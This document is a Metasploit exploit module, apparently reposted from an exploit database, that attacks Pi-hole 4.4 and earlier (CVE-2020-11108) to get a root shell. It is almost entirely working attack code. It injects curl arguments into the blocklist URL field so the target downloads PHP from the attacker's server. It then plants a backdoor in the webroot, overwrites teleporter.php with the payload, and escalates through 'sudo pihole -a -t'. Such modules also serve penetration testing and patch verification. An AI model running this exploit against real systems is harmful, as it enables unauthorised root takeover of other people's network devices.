Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)

2020-05-23
ID: 102996
CVE: None
Download vulnerable application: None
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Pi-Hole heisenbergCompensator Blocklist OS Command Execution',
        'Description' => %q{
          This exploits a command execution in Pi-Hole <= 4.4.  A new blocklist is added, and then an
          update is forced (gravity) to pull in the blocklist content.  PHP content is then written
          to a file within the webroot.  Phase 1 writes a sudo pihole command to launch teleporter,
          effectively running a priv esc.  Phase 2 writes our payload to teleporter.php, overwriting,
          the content.  Lastly, the phase 1 PHP file is called in the web root, which launches
          our payload in teleporter.php with root privileges.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'h00die', # msf module
            'Nick Frichette' # original PoC, discovery
          ],
        'References' =>
          [
            ['EDB', '48443'],
            ['EDB', '48442'],
            ['URL', 'https://frichetten.com/blog/cve-2020-11108-pihole-rce/'],
            ['URL', 'https://github.com/frichetten/CVE-2020-11108-PoC'],
            ['CVE', '2020-11108']
          ],
        'Platform' => ['php'],
        'Privileged' => true,
        'Arch' => ARCH_PHP,
        'Targets' =>
          [
            [ 'Automatic Target', {}]
          ],
        'DisclosureDate' => 'May 10 2020',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
    # set the default port, and a URI that a user can set if the app isn't installed to the root
    register_options(
      [
        Opt::RPORT(80),
        OptPort.new('SRVPORT', [true, 'Web Server Port, must be 80', 80]),
        OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']),
        OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])
      ]
    )
  end

  def setup
    super
    @stage = 0
  end

  def on_request_uri(cli, request)
    if request.method == 'GET'
      vprint_status('Received GET request.  Responding')
      send_response(cli, rand_text_alphanumeric(5..10))
      return
    end

    case @stage
    when 0
      vprint_status('(1/2) Sending priv esc trigger')
      send_response(cli, %q{<?php shell_exec("sudo pihole -a -t") ?>})
      @stage += 1
    when 1
      vprint_status('(2/2) Sending root payload')
      send_response(cli, payload.encoded)
      @stage = 0
    else
      send_response(cli, rand_text_alphanumeric(5..10))
      vprint_status("Server received default request for #{request.uri}")
    end
  end

  def check
    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
        'method' => 'GET'
      )
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200

      # <b>Pi-hole Version <\/b> v4.3.2                                                            <b>
      # <b>Pi-hole Version </b> v4.3.2 <a class="alert-link lookatme" href="https://github.com/pi-hole/pi-hole/releases" target="_blank">(Update available!)</a>            <b>
      %r{<b>Pi-hole Version\s*</b>\s*v?(?<version>[\d\.]+).*<b>} =~ res.body

      if version && Gem::Version.new(version) <= Gem::Version.new('4.4')
        vprint_good("Version Detected: #{version}")
        return CheckCode::Appears
      else
        vprint_bad("Version Detected: #{version}")
        return CheckCode::Safe
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
    CheckCode::Safe
  end

  def add_blocklist(file, token, cookie)
    # according to the writeup, if you have a port, the colon gets messed up in the encoding.
    # also, looks like if you have a path (/file.php), it won't trigger either, or the / gets
    # messed with.
    data = {
      'newuserlists' => %(http://#{datastore['SRVHOST']}#" -o #{file} -d "),
      'field' => 'adlists',
      'token' => token,
      'submit' => 'saveupdate'
    }

    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
      'method' => 'POST',
      'cookie' => cookie,
      'vars_get' => {
        'tab' => 'blocklists'
      },
      'data' => data.to_query
    )
  end

  def update_gravity(cookie)
    vprint_status('Forcing gravity pull')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', 'gravity.sh.php'),
      'cookie' => cookie
    )
  end

  def execute_shell(backdoor_name, cookie)
    vprint_status('Popping root shell')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', backdoor_name),
      'cookie' => cookie
    )
  end

  def login(cookie)
    vprint_status('Login required, attempting login.')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
      'cookie' => cookie,
      'vars_get' => {
        'tab' => 'blocklists'
      },
      'vars_post' => {
        'pw' => datastore['PASSWORD']
      },
      'method' => 'POST'
    )
  end

  def exploit
    if check != CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    if datastore['SRVPORT'] != 80
      fail_with(Failure::BadConfig, 'SRVPORT must be set to 80 for exploitation to be successful')
    end

    if datastore['SRVHOST'] == '0.0.0.0'
      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
    end

    start_service({ 'Uri' => {
      'Proc' => proc do |cli, req|
        on_request_uri(cli, req)
      end,
      'Path' => '/'
    } })

    begin
      # get cookie
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php')
      )
      cookie = res.get_cookies
      print_status("Using cookie: #{cookie}")

      # get token
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
        'cookie' => cookie,
        'vars_get' => {
          'tab' => 'blocklists'
        }
      )

      # check if we got hit by a login prompt
      if res && res.body.include?('Sign in to start your session')
        res = login(cookie)
      end

      if res && res.body.include?('Sign in to start your session')
        fail_with(Failure::BadConfig, 'Incorrect Password')
      end

      # <input type="hidden" name="token" value="t51q3YuxWT873Nn+6lCyMG4Lg840gRCgu03akuXcvTk=">
      # may also include /
      %r{name="token" value="(?<token>[\w+=/]+)">} =~ res.body

      unless token
        fail_with(Failure::UnexpectedReply, 'Unable to find token')
      end
      print_status("Using token: #{token}")

      # plant backdoor
      backdoor_name = "#{rand_text_alphanumeric 5..10}.php"
      register_file_for_cleanup backdoor_name
      print_status('Adding backdoor reference')
      add_blocklist(backdoor_name, token, cookie)

      # update gravity
      update_gravity(cookie)
      if @stage == 0
        print_status('Sending 2nd gravity update request.')
        update_gravity(cookie)
      end

      # plant root upgrade
      print_status('Adding root reference')
      add_blocklist('teleporter.php', token, cookie)

      # update gravity
      update_gravity(cookie)
      if @stage == 1
        print_status('Sending 2nd gravity update request.')
        update_gravity(cookie)
      end

      # pop shell
      execute_shell(backdoor_name, cookie)
      print_status("Blocklists must be removed manually from #{normalize_uri(target_uri.path, 'admin', 'settings.php')}?tab=blocklists")
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end

  end
end
1-4-2 (www01)